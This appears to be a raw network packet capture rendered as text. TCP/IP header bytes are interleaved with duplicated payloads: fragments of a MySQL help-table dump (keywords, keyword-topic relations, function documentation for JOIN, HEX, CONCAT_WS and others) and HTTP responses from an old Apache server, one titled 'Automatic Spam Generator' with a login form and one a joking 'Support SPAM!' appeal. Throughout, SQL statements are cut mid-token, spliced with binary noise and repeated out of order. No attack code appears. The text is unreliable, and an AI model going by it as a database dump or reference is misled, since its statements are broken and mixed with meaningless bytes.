(273,'INTERVAL'),(274,'DAY_HOUR'),(275,'REFERENCES'),(276,'AES_ENCRYPT'),(277,'ISOLATION'),(278,'INT8'),(279,'RESTRICT'),(280,'IS'),(281,'UNCOMMITTED'),(282,'NOT'),(283,'DECZZʪBiEL@/o0o0oE4@@A  Pկ8Ou  1TL7=vՌC`ZZBi0`EL@/Ao0E4)@?Z  ePZ>!b c^"CqZZ0`BiEL@/o0  E4)@@Y  ePZ>!b c^"CAbbBi0`ET@/p܂Ao0E<@?x  3P3Ktj   )S_KEY_FILE'),(284,'COMPRESSED'),(285,'START'),(286,'IF'),(287,'SAVEPOINT'),(288,'PRIMARY'),(289,'LAST'),(290,'INNOBASE'),(291,'LIMIT'),(292,'KEYS'),(293,'KEY'),(294,'MERGE'),(295,'SQL_NO_CACHE'),(296,'DELAYED'),(297,'CONSTRAINT'),(298,'SERIAL'),(299,'ACTION'),(300,'WRITE'),(301,'SESSION'),(302,'DATABASE'),(303,'NULL'),(304,'USE_FRM'),(305,'SLAVE'),(306,'TERMINATED'),(307,'ASC'),(308,'OPTIONALLY'),(309,'ENABLE'),(310,'DIRECTORY'),(311,'LOCAL'),(312,'DISTINCT'),(313,'MASTER_SSL_KEY'),(314,'TABLES'),(315,'<>'),(316,'HIGH_PRIORITY'),(317,'BTREE'),(318,'FIRST'),(319,'TYPES'),(320,'MASTER'),(321,'FIXED'),(322,'RAID0'),(323,'MULTIPOLYGONFROMTEXT'),(324,'ROW_FORMAT'); UNLOCK TABLES; /*!40000 ALTER TABLE `help_keyword` ENABLE KEYS */; -- -- Table structure for table `help_relation` -- DROP TABLE IF EXISTS `help_relation`; CREATE TABLE `help_relation` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `help_keyword_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`help_keyword_id`,`help_topic_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='keyword-topic relation'; -- -- Dumping data for table `help_relation` -- /*!40000 ALTER TABLE `help_relation` DISABLE KEYS */; LOCK TABLES `help_relation` WRITE; INSERT INTO `help_relation` VALUES (379,0),(281,1),(CHZZBi0`EL@/܂Sŀo0E4yZ@?H  DPВT6?ʅ /7=vCXbb0`BiET@/Ԁo0SE<@@w  3P3Ktj   )S_KEY_FILE'),(284,'COMPRESSED'),(285,'START'),(286,'IF'),(287,'SAVEPOINT'),(288,'PRIMARY'),(289,'LAST'),(290,'INNOBASE'),(291,'LIMIT'),(292,'KEYS'),(293,'KEY'),(294,'MERGE'),(295,'SQL_NO_CACHE'),(296,'DELAYED'),(297,'CONSTRAINT'),(298,'SERIAL'),(299,'ACTION'),(300,'WRITE'),(301,'SESSION'),(302,'DATABASE'),(303,'NULL'),(304,'USE_FRM'),(305,'SLAVE'),(306,'TERMINATED'),(307,'ASC'),(308,'OPTIONALLY'),(309,'ENABLE'),(310,'DIRECTORY'),(311,'LOCAL'),(312,'DISTINCT'),(313,'MASTER_SSL_KEY'),(314,'TABLES'),(315,'<>'),(316,'HIGH_PRIORITY'),(317,'BTREE'),(318,'FIRST'),(319,'TYPES'),(320,'MASTER'),(321,'FIXED'),(322,'RAID0'),(323,'MULTIPOLYGONFROMTEXT'),(324,'ROW_FORMAT'); UNLOCK TABLES; /*!40000 ALTER TABLE `help_keyword` ENABLE KEYS */; -- -- Table structure for table `help_relation` -- DROP TABLE IF EXISTS `help_relation`; CREATE TABLE `help_relation` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `help_keyword_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`help_keyword_id`,`help_topic_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='keyword-topic relation'; -- -- Dumping data for table `help_relation` -- /*!40000 ALTER TABLE `help_relation` DISABLE KEYS */; LOCK TABLES `help_relation` WRITE; INSERT INTO `help_relation` VALUES (379,0),(281,1),(CbZZʪBiEL@/o0o0oE4yZ@@H  DPВT6?ʅ /7=vC:RRBi0`ED@/9do0E,@?v  P#vZA 7 ]:7=vbHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:43:06 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 1dc Automatic Spam Generator Goto main page

List of the uploaded mails

Username: Password


CORRʪBiED@/o0o0oE,@@v  P#vZA 4 ]:7=vbHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:43:06 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html 1dc Automatic Spam Generator Goto main page

List of the uploaded mails

Username: Password


CbbBi0`ET@/p܂Ao0E<@?x  3P8Stj  )351,2),(331,3),(127,4),(148,5),(337,6),(272,7),(109,8),(299,9),(62,10),(281,10),(78,11),(272,11),(127,12),(396,12),(302,13),(190,14),(80,15),(19,16),(61,16),(127,16),(149,16),(219,16),(368,16),(281,17),(186,18),(20,19),(397,20),(117,21),(40,22),(23,23),(272,24),(371,24),(20,25),(23,26),(281,26),(371,27),(371,28),(272,29),(371,29),(396,30),(34,31),(60,31),(281,31),(287,31),(331,31),(368,31),(371,31),(371,32),(375,32),(20,33),(87,34),(331,34),(371,34),(20,35),(371,36),(281,37),(127,38),(247,38),(287,39),(371,40),(375,40),(0,41),(375,41),(24,42),(78,43),(0,44),(34,45),(60,45),(78,45),(166,46),(368,46),(281,47),(0,48),(60,48),(117,48),(281,48),(331,48),(368,48),(24,49),(34,49),(265,49),(299,50),(305,51),(64,52),(371,53),(351,54),(0,55),(204,56),(236,56),(299,56),(337,56),(148,57),(363,57),(148,58),(368,58),(20,59),(117,60),(281,60),(375,60),(30,61),(117,61),(281,61),(371,62),(204,63),(20,64),(96,65),(109,66),(363,66),(379,67),(166,68),(281,69),(70,70),(150,70),(331,71),(62,72),(371,73),(117,74),(387,74),(340,75),(226,76),(104,77),(272,78),(20,79),(19,80),(119,80),(149,80),(219,80),(15,81),(62,81),(117,82),(190,82),(368,82),(371,82),(137,83),(368,84),(371,84),(259,85),(265,85),(374,85),(25,86),(114,86),(209,86),(174,87),(30,88),(60,88),(109,88),(145,88),(167,88),(368,88),(CZZBiʪEL@/o0oo0E4JG@@h PZA#v\ 7=w]:Cbb0`BiET@/Ԁo0SE<@@w  3P8Stj  )351,2),(331,3),(127,4),(148,5),(337,6),(272,7),(109,8),(299,9),(62,10),(281,10),(78,11),(272,11),(127,12),(396,12),(302,13),(190,14),(80,15),(19,16),(61,16),(127,16),(149,16),(219,16),(368,16),(281,17),(186,18),(20,19),(397,20),(117,21),(40,22),(23,23),(272,24),(371,24),(20,25),(23,26),(281,26),(371,27),(371,28),(272,29),(371,29),(396,30),(34,31),(60,31),(281,31),(287,31),(331,31),(368,31),(371,31),(371,32),(375,32),(20,33),(87,34),(331,34),(371,34),(20,35),(371,36),(281,37),(127,38),(247,38),(287,39),(371,40),(375,40),(0,41),(375,41),(24,42),(78,43),(0,44),(34,45),(60,45),(78,45),(166,46),(368,46),(281,47),(0,48),(60,48),(117,48),(281,48),(331,48),(368,48),(24,49),(34,49),(265,49),(299,50),(305,51),(64,52),(371,53),(351,54),(0,55),(204,56),(236,56),(299,56),(337,56),(148,57),(363,57),(148,58),(368,58),(20,59),(117,60),(281,60),(375,60),(30,61),(117,61),(281,61),(371,62),(204,63),(20,64),(96,65),(109,66),(363,66),(379,67),(166,68),(281,69),(70,70),(150,70),(331,71),(62,72),(371,73),(117,74),(387,74),(340,75),(226,76),(104,77),(272,78),(20,79),(19,80),(119,80),(149,80),(219,80),(15,81),(62,81),(117,82),(190,82),(368,82),(371,82),(137,83),(368,84),(371,84),(259,85),(265,85),(374,85),(25,86),(114,86),(209,86),(174,87),(30,88),(60,88),(109,88),(145,88),(167,88),(368,88),(CȧZZ0`BiEL@/ o09dE4JG@@k  PZA#v_ 7=w]:CZZBi0`EL@/܂Sŀo0E4\%@?Z 3 Pu}U`D$\ )CZZBi0`EL@/܂Sŀo0E4@?R 3 PZi  )^7C*ZZ0`BiEL@/go0AE4\%@@Z 3 Pu}U`D$\ )C5ZZ0`BiEL@/o0  E4@@Q 3 PZi  )^7C bbBi0`ET@/p܂Ao0E<@?x  3P=[tj f )375,88),(391,88),(20,89),(97,89),(208,89),(299,89),(41,90),(176,90),(272,90),(291,90),(166,91),(368,91),(371,91),(371,92),(148,93),(0,94),(37,95),(148,96),(371,97),(247,98),(359,99),(226,100),(104,101),(37,102),(258,102),(34,103),(87,103),(186,103),(272,103),(281,103),(286,103),(359,103),(23,104),(78,104),(351,104),(0,105),(20,106),(371,107),(164,108),(272,109),(281,109),(272,110),(371,111),(127,112),(127,113),(331,114),(127,115),(272,116),(331,116),(199,117),(371,118),(368,119),(371,119),(43,120),(368,120),(131,121),(371,122),(19,123),(122,123),(351,124),(331,125),(34,126),(60,126),(281,126),(287,126),(368,126),(0,127),(34,127),(199,128),(15,129),(94,129),(131,129),(164,129),(247,129),(299,129),(396,129),(326,130),(272,131),(368,132),(371,132),(375,132),(114,133),(108,134),(272,134),(109,135),(272,136),(359,137),(87,138),(286,138),(331,138),(281,139),(299,140),(371,141),(314,142),(369,143),(355,144),(96,145),(145,145),(351,145),(371,146),(104,147),(281,148),(0,149),(23,149),(281,149),(331,150),(109,151),(272,152),(0,153),(174,154),(368,155),(323,156),(368,157),(331,158),(371,158),(281,159),(23,160),(30,160),(34,160),(60,160),(117,160),(331,160),(371,161),(119,162),(149,162),(167,162),(272,162),(127,163),(384,164),(367,165),(0,166),(43,166),(61,166),(166,166),(272,166Cbb0`BiET@/Ԁo0SE<@@w  3P=[tj f )375,88),(391,88),(20,89),(97,89),(208,89),(299,89),(41,90),(176,90),(272,90),(291,90),(166,91),(368,91),(371,91),(371,92),(148,93),(0,94),(37,95),(148,96),(371,97),(247,98),(359,99),(226,100),(104,101),(37,102),(258,102),(34,103),(87,103),(186,103),(272,103),(281,103),(286,103),(359,103),(23,104),(78,104),(351,104),(0,105),(20,106),(371,107),(164,108),(272,109),(281,109),(272,110),(371,111),(127,112),(127,113),(331,114),(127,115),(272,116),(331,116),(199,117),(371,118),(368,119),(371,119),(43,120),(368,120),(131,121),(371,122),(19,123),(122,123),(351,124),(331,125),(34,126),(60,126),(281,126),(287,126),(368,126),(0,127),(34,127),(199,128),(15,129),(94,129),(131,129),(164,129),(247,129),(299,129),(396,129),(326,130),(272,131),(368,132),(371,132),(375,132),(114,133),(108,134),(272,134),(109,135),(272,136),(359,137),(87,138),(286,138),(331,138),(281,139),(299,140),(371,141),(314,142),(369,143),(355,144),(96,145),(145,145),(351,145),(371,146),(104,147),(281,148),(0,149),(23,149),(281,149),(331,150),(109,151),(272,152),(0,153),(174,154),(368,155),(323,156),(368,157),(331,158),(371,158),(281,159),(23,160),(30,160),(34,160),(60,160),(117,160),(331,160),(371,161),(119,162),(149,162),(167,162),(272,162),(127,163),(384,164),(367,165),(0,166),(43,166),(61,166),(166,166),(272,166C__Bi0`EQ@/ 9do0E9@?y  P#vZA ^ ]:7=vb0 C__ʪBiEQ@/o0o0oE9@@y  P#vZA [ ]:7=vb0 CzZZBiʪEL@/o0oo0E4JI@@f PZA#vR 7=w]:CZZ0`BiEL@/ o09dE4JI@@i  PZA#vU 7=w]:CZZBiʪEL@/o0oo0E4JK@@d PZA#vQ 7=w]:C ZZ0`BiEL@/ o09dE4JK@@g  PZA#vT 7=w]:CnbbBi0`ET@/p܂Ao0E<@?x  3PBctj l} )),(368,166),(371,166),(334,167),(283,168),(215,169),(24,170),(265,170),(0,171),(204,172),(337,172),(281,173),(15,174),(94,174),(131,174),(164,174),(247,174),(396,174),(148,175),(148,176),(305,177),(167,178),(204,178),(337,178),(148,179),(272,180),(291,180),(368,180),(371,180),(24,181),(43,181),(118,181),(219,181),(265,181),(272,181),(283,181),(286,181),(374,181),(371,182),(19,183),(219,183),(371,183),(375,183),(148,184),(281,185),(371,186),(368,187),(62,188),(148,189),(260,190),(281,190),(287,190),(281,191),(248,192),(298,192),(299,192),(164,193),(194,194),(371,195),(114,196),(43,197),(119,197),(127,197),(166,197),(272,197),(371,197),(371,198),(182,199),(272,200),(236,201),(272,201),(291,201),(371,202),(300,203),(110,204),(79,205),(371,206),(30,207),(24,208),(204,209),(41,210),(108,210),(176,210),(186,210),(236,210),(291,210),(241,211),(281,211),(371,212),(259,213),(371,214),(186,215),(104,216),(20,217),(110,218),(249,218),(247,219),(78,220),(20,221),(30,222),(203,222),(272,223),(103,224),(148,225),(145,226),(359,227),(15,228),(82,228),(20,229),(148,230),(331,231),(368,232),(148,233),(20,234),(272,235),(300,235),(62,236),(186,236),(281,236),(368,237),(281,238),(281,239),(352,240),(114,241),(148,242),(331,243),(37,244),(258,244),(91,245),(148,246),(20,247),(109,248),(3Cbb0`BiET@/Ԁo0SE<@@w  3PBctj l} )),(368,166),(371,166),(334,167),(283,168),(215,169),(24,170),(265,170),(0,171),(204,172),(337,172),(281,173),(15,174),(94,174),(131,174),(164,174),(247,174),(396,174),(148,175),(148,176),(305,177),(167,178),(204,178),(337,178),(148,179),(272,180),(291,180),(368,180),(371,180),(24,181),(43,181),(118,181),(219,181),(265,181),(272,181),(283,181),(286,181),(374,181),(371,182),(19,183),(219,183),(371,183),(375,183),(148,184),(281,185),(371,186),(368,187),(62,188),(148,189),(260,190),(281,190),(287,190),(281,191),(248,192),(298,192),(299,192),(164,193),(194,194),(371,195),(114,196),(43,197),(119,197),(127,197),(166,197),(272,197),(371,197),(371,198),(182,199),(272,200),(236,201),(272,201),(291,201),(371,202),(300,203),(110,204),(79,205),(371,206),(30,207),(24,208),(204,209),(41,210),(108,210),(176,210),(186,210),(236,210),(291,210),(241,211),(281,211),(371,212),(259,213),(371,214),(186,215),(104,216),(20,217),(110,218),(249,218),(247,219),(78,220),(20,221),(30,222),(203,222),(272,223),(103,224),(148,225),(145,226),(359,227),(15,228),(82,228),(20,229),(148,230),(331,231),(368,232),(148,233),(20,234),(272,235),(300,235),(62,236),(186,236),(281,236),(368,237),(281,238),(281,239),(352,240),(114,241),(148,242),(331,243),(37,244),(258,244),(91,245),(148,246),(20,247),(109,248),(3CaZZBi0`EL@/܂Sŀo0E4\'@?X 3 Pu}UjT$I )CrZZ0`BiEL@/go0AE4\'@@X 3 Pu}UjT$I )CҴbbBi0`ET@/p܂Ao0E<@?x  3PGktj e )51,248),(20,249),(107,250),(15,251),(368,252),(0,253),(43,254),(122,254),(368,254),(371,255),(0,256),(281,256),(0,257),(272,258),(331,259),(225,260),(371,261),(299,262),(369,262),(281,263),(78,264),(391,265),(272,266),(219,267),(281,268),(351,269),(371,270),(109,271),(24,272),(20,273),(20,274),(371,275),(375,275),(393,276),(351,277),(94,278),(19,279),(219,279),(375,279),(293,280),(351,281),(119,282),(245,282),(259,283),(371,284),(109,285),(258,285),(19,286),(119,286),(149,286),(219,286),(363,287),(368,288),(78,289),(371,290),(34,291),(60,291),(78,291),(186,291),(281,291),(272,292),(368,292),(43,293),(117,293),(368,293),(371,293),(375,293),(371,294),(281,295),(30,296),(117,296),(387,296),(368,297),(371,297),(190,298),(371,298),(371,299),(375,299),(23,300),(96,301),(351,301),(119,302),(149,302),(272,302),(293,303),(375,303),(265,304),(25,305),(37,305),(108,305),(176,305),(258,305),(331,306),(281,307),(287,307),(331,308),(368,309),(371,310),(23,311),(259,311),(265,311),(331,311),(374,311),(228,312),(281,312),(287,312),(306,312),(340,312),(379,312),(148,313),(23,314),(272,314),(392,315),(117,316),(281,316),(166,317),(78,318),(368,318),(371,318),(272,319),(41,320),(87,320),(148,320),(209,320),(236,320),(286,320),(164,321),(371,321),(371,322),(157,323),(371,324); UNLOCK TABCbb0`BiET@/Ԁo0SE<@@w  3PGktj e )51,248),(20,249),(107,250),(15,251),(368,252),(0,253),(43,254),(122,254),(368,254),(371,255),(0,256),(281,256),(0,257),(272,258),(331,259),(225,260),(371,261),(299,262),(369,262),(281,263),(78,264),(391,265),(272,266),(219,267),(281,268),(351,269),(371,270),(109,271),(24,272),(20,273),(20,274),(371,275),(375,275),(393,276),(351,277),(94,278),(19,279),(219,279),(375,279),(293,280),(351,281),(119,282),(245,282),(259,283),(371,284),(109,285),(258,285),(19,286),(119,286),(149,286),(219,286),(363,287),(368,288),(78,289),(371,290),(34,291),(60,291),(78,291),(186,291),(281,291),(272,292),(368,292),(43,293),(117,293),(368,293),(371,293),(375,293),(371,294),(281,295),(30,296),(117,296),(387,296),(368,297),(371,297),(190,298),(371,298),(371,299),(375,299),(23,300),(96,301),(351,301),(119,302),(149,302),(272,302),(293,303),(375,303),(265,304),(25,305),(37,305),(108,305),(176,305),(258,305),(331,306),(281,307),(287,307),(331,308),(368,309),(371,310),(23,311),(259,311),(265,311),(331,311),(374,311),(228,312),(281,312),(287,312),(306,312),(340,312),(379,312),(148,313),(23,314),(272,314),(392,315),(117,316),(281,316),(166,317),(78,318),(368,318),(371,318),(272,319),(41,320),(87,320),(148,320),(209,320),(236,320),(286,320),(164,321),(371,321),(371,322),(157,323),(371,324); UNLOCK TABCƶBi0`E@/"怂<o0E@?@n  Pկ8Ou  1TR7=vHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:36 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Last-Modified: Wed, 07 Dec 2005 21:12:24 GMT ETag: "72779-29c-9bca7e00" Accept-Ranges: bytes Content-Length: 668 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html CضʪBiE@/o0o0oE@@@  Pկ8Ou 6 1TR7=vHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:36 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Last-Modified: Wed, 07 Dec 2005 21:12:24 GMT ETag: "72779-29c-9bca7e00" Accept-Ranges: bytes Content-Length: 668 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html CCBi0`E@/!<o0E@???  Pկ8lOu 4 1TR7=v Support SPAM!

Stand shoulder to shoulder with the foremost curators of SPAM history. We need your help to ensure the memory of SPAM endures for all future generations of man. Please, friend, make your most generous contribution!

CVʪBiE@/{o0o0oE@@?^  Pկ8lOu 51 1TR7=v Support SPAM!

Stand shoulder to shoulder with the foremost curators of SPAM history. We need your help to ensure the memory of SPAM endures for all future generations of man. Please, friend, make your most generous contribution!

C6bbBi0`ET@/p܂Ao0E<@?x  3PLstj + )LES; /*!40000 ALTER TABLE `help_relation` ENABLE KEYS */; -- -- Table structure for table `help_topic` -- DROP TABLE IF EXISTS `help_topic`; CREATE TABLE `help_topic` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `help_category_id` smallint(5) unsigned NOT NULL default '0', `description` text NOT NULL, `example` text NOT NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_topic_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help topics'; -- -- Dumping data for table `help_topic` -- /*!40000 ALTER TABLE `help_topic` DISABLE KEYS */; LOCK TABLES `help_topic` WRITE; INSERT INTO `help_topic` VALUES (0,'JOIN',6,'MySQL supports the following JOIN syntaxes for the\ntable_references part of SELECT statements and multiple-table\nDELETE and UPDATE statements:\n\ntable_reference, table_reference\ntable_reference [INNER | CROSS] JOIN table_reference [join_condition]\ntable_reference STRAIGHT_JOIN table_reference\ntable_reference LEFT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [LEFT [OUTER]] JOIN table_reference\n{ OJ table_reference LEFT OUTER JOIN table_reference\n ON conditional_expr }\ntable_reference RIGHT [OUTER] JOIN table_refereC=ZZBiʪEL@/o0oo0E4@@ կPOu8l> 7=w1TRCMbb0`BiET@/Ԁo0SE<@@w  3PLstj + )LES; /*!40000 ALTER TABLE `help_relation` ENABLE KEYS */; -- -- Table structure for table `help_topic` -- DROP TABLE IF EXISTS `help_topic`; CREATE TABLE `help_topic` ( `help_topic_id` int(10) unsigned NOT NULL default '0', `name` varchar(64) NOT NULL default '', `help_category_id` smallint(5) unsigned NOT NULL default '0', `description` text NOT NULL, `example` text NOT NULL, `url` varchar(128) NOT NULL default '', PRIMARY KEY (`help_topic_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help topics'; -- -- Dumping data for table `help_topic` -- /*!40000 ALTER TABLE `help_topic` DISABLE KEYS */; LOCK TABLES `help_topic` WRITE; INSERT INTO `help_topic` VALUES (0,'JOIN',6,'MySQL supports the following JOIN syntaxes for the\ntable_references part of SELECT statements and multiple-table\nDELETE and UPDATE statements:\n\ntable_reference, table_reference\ntable_reference [INNER | CROSS] JOIN table_reference [join_condition]\ntable_reference STRAIGHT_JOIN table_reference\ntable_reference LEFT [OUTER] JOIN table_reference join_condition\ntable_reference NATURAL [LEFT [OUTER]] JOIN table_reference\n{ OJ table_reference LEFT OUTER JOIN table_reference\n ON conditional_expr }\ntable_reference RIGHT [OUTER] JOIN table_refereCYZZ0`BiEL@/To0<E4@@  կPOu8l 7=w1TRCZZBiʪEL@/o0oo0E4@@ կPOu8T 7=w1TRCιZZ0`BiEL@/To0<E4@@  կPOu85 7=w1TRCZZBiʪEL@/o0oo0E4@@ կPOu8Q 7=w1TRCZZ0`BiEL@/To0<E4@@  կPOu82 7=w1TRC{bbBiʪET@/o0oo0E<9@@yo ձPLۢp  7=wCbb0`BiET@/Lo0<E<9@@xP  ձPLۢp 9 7=wCibbBi0`ET@/p܂Ao0E<@?x  3PQ{tj  )nce join_condition\ntable_reference NATURAL [RIGHT [OUTER]] JOIN table_reference\n\ntable_reference is defined as:\n\ntbl_name [[AS] alias]\n [[USE INDEX (key_list)]\n | [IGNORE INDEX (key_list)]\n | [FORCE INDEX (key_list)]]\n\njoin_condition is defined as:\n\nON conditional_expr | USING (column_list)\n','mysql> SELECT table1.* FROM table1\n -> LEFT JOIN table2 ON table1.id=table2.id\n -> WHERE table2.id IS NULL;',''),(1,'HEX',23,' HEX(N_or_S)\n\nIf N_OR_S is a number, returns a string representation of the hexadecimal\nvalue of N, where N is a longlong (BIGINT) number.\nThis is equivalent to CONV(N,10,16).\n\nFrom MySQL 4.0.1 and up,\nif N_OR_S is a string, returns a hexadecimal string of N_OR_S\nwhere each character in N_OR_S is converted to two hexadecimal digits.\n','mysql> SELECT HEX(255);\n -> \'FF\'\nmysql> SELECT 0x616263;\n -> \'abc\'\nmysql> SELECT HEX(\'abc\');\n -> 616263',''),(2,'REPLACE',23,' REPLACE(str,from_str,to_str)\nReturns the string str with all occurrences of the string\nfrom_str replaced by the string to_str.\n','mysql> SELECT REPLACE(\'www.mysql.com\', \'w\', \'Ww\');\n -> \'WwWwWw.mysql.com\'',''),(3,'REPEAT',23,' REPEAT(str,count)\nReturns a string consisting of the string sCpZZBi0`EL@/܂Sŀo0E4\)@?V 3 Pu}Utd$9 )Cbb0`BiET@/Ԁo0SE<@@w  3PQ{tj  )nce join_condition\ntable_reference NATURAL [RIGHT [OUTER]] JOIN table_reference\n\ntable_reference is defined as:\n\ntbl_name [[AS] alias]\n [[USE INDEX (key_list)]\n | [IGNORE INDEX (key_list)]\n | [FORCE INDEX (key_list)]]\n\njoin_condition is defined as:\n\nON conditional_expr | USING (column_list)\n','mysql> SELECT table1.* FROM table1\n -> LEFT JOIN table2 ON table1.id=table2.id\n -> WHERE table2.id IS NULL;',''),(1,'HEX',23,' HEX(N_or_S)\n\nIf N_OR_S is a number, returns a string representation of the hexadecimal\nvalue of N, where N is a longlong (BIGINT) number.\nThis is equivalent to CONV(N,10,16).\n\nFrom MySQL 4.0.1 and up,\nif N_OR_S is a string, returns a hexadecimal string of N_OR_S\nwhere each character in N_OR_S is converted to two hexadecimal digits.\n','mysql> SELECT HEX(255);\n -> \'FF\'\nmysql> SELECT 0x616263;\n -> \'abc\'\nmysql> SELECT HEX(\'abc\');\n -> 616263',''),(2,'REPLACE',23,' REPLACE(str,from_str,to_str)\nReturns the string str with all occurrences of the string\nfrom_str replaced by the string to_str.\n','mysql> SELECT REPLACE(\'www.mysql.com\', \'w\', \'Ww\');\n -> \'WwWwWw.mysql.com\'',''),(3,'REPEAT',23,' REPEAT(str,count)\nReturns a string consisting of the string sCZZ0`BiEL@/go0AE4\)@@V 3 Pu}Utd$9 )CbbBi0`ET@/p܂Ao0E<@?x  3PVtj  )tr repeated count\ntimes. If count <= 0, returns an empty string. Returns NULL if\nstr or count are NULL.\n','mysql> SELECT REPEAT(\'MySQL\', 3);\n -> \'MySQLMySQLMySQL\'',''),(4,'CONTAINS',11,' Contains(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 completely contains\ng2.\n','',''),(5,'SRID',19,' SRID(g)\nReturns an integer indicating the Spatial Reference System ID for the geometry\nvalue g.\n\nIn MySQL, the SRID value is just an integer associated with the geometry\nvalue. All calculations are done assuming Euclidean (planar) geometry.\n','mysql> SELECT SRID(GeomFromText(\'LineString(1 1,2 2)\',101));\n+-----------------------------------------------+\n| SRID(GeomFromText(\'LineString(1 1,2 2)\',101)) |\n+-----------------------------------------------+\n| 101 |\n+-----------------------------------------------+',''),(6,'CURRENT_TIMESTAMP',14,' CURRENT_TIMESTAMP\n CURRENT_TIMESTAMP()\n\nCURRENT_TIMESTAMP and CURRENT_TIMESTAMP() are synonyms for\nNOW().\n','',''),(7,'VARIANCE',12,' VARIANCE(expr)\nReturns the population standard variance of expr. This is an\nextension to standard SQL, available in MySQL 4.1 or later. As of MySQL\n5.0.3, the standard SQL function VAR_POP() can be used instead.\n',''CZZBi0`EL@/܂Sŀo0E4\+@?T 3 Pu}U~t$( )C bb0`BiET@/Ԁo0SE<@@w  3PVtj  )tr repeated count\ntimes. If count <= 0, returns an empty string. Returns NULL if\nstr or count are NULL.\n','mysql> SELECT REPEAT(\'MySQL\', 3);\n -> \'MySQLMySQLMySQL\'',''),(4,'CONTAINS',11,' Contains(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 completely contains\ng2.\n','',''),(5,'SRID',19,' SRID(g)\nReturns an integer indicating the Spatial Reference System ID for the geometry\nvalue g.\n\nIn MySQL, the SRID value is just an integer associated with the geometry\nvalue. All calculations are done assuming Euclidean (planar) geometry.\n','mysql> SELECT SRID(GeomFromText(\'LineString(1 1,2 2)\',101));\n+-----------------------------------------------+\n| SRID(GeomFromText(\'LineString(1 1,2 2)\',101)) |\n+-----------------------------------------------+\n| 101 |\n+-----------------------------------------------+',''),(6,'CURRENT_TIMESTAMP',14,' CURRENT_TIMESTAMP\n CURRENT_TIMESTAMP()\n\nCURRENT_TIMESTAMP and CURRENT_TIMESTAMP() are synonyms for\nNOW().\n','',''),(7,'VARIANCE',12,' VARIANCE(expr)\nReturns the population standard variance of expr. This is an\nextension to standard SQL, available in MySQL 4.1 or later. As of MySQL\n5.0.3, the standard SQL function VAR_POP() can be used instead.\n',''CZZ0`BiEL@/go0AE4\+@@T 3 Pu}U~t$( )ChbbBi0`ET@/p܂Ao0E SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'First name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API function.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-----CqbbBiʪET@/o0oo0E<7@@ P@Bpa 7=wCbb0`BiET@/Ԁo0SE SELECT 5 & ~1;\n -> 4',''),(124,'CONCAT_WS',23,' CONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for CONCAT With Separator and is a special form of\nCONCAT(). The first argument is the separator for the rest of the\narguments.\nThe separator is added between the strings to be concatenated.\nThe separator can be a string as can the rest of the\narguments. If the separator is NULL, the result is NULL.\nThe function skips any NULL values after the\nseparator argument.\n','mysql> SELECT CONCAT_WS(\',\',\'First name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'',''),(125,'ROW_COUNT',25,' ROW_COUNT()\n\nROW_COUNT() returns the number of rows updated, inserted, or deleted\nby the preceding statement. This is the same as the row count that the\nmysql client displays and the value from the\nmysql_affected_rows() C API function.\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() 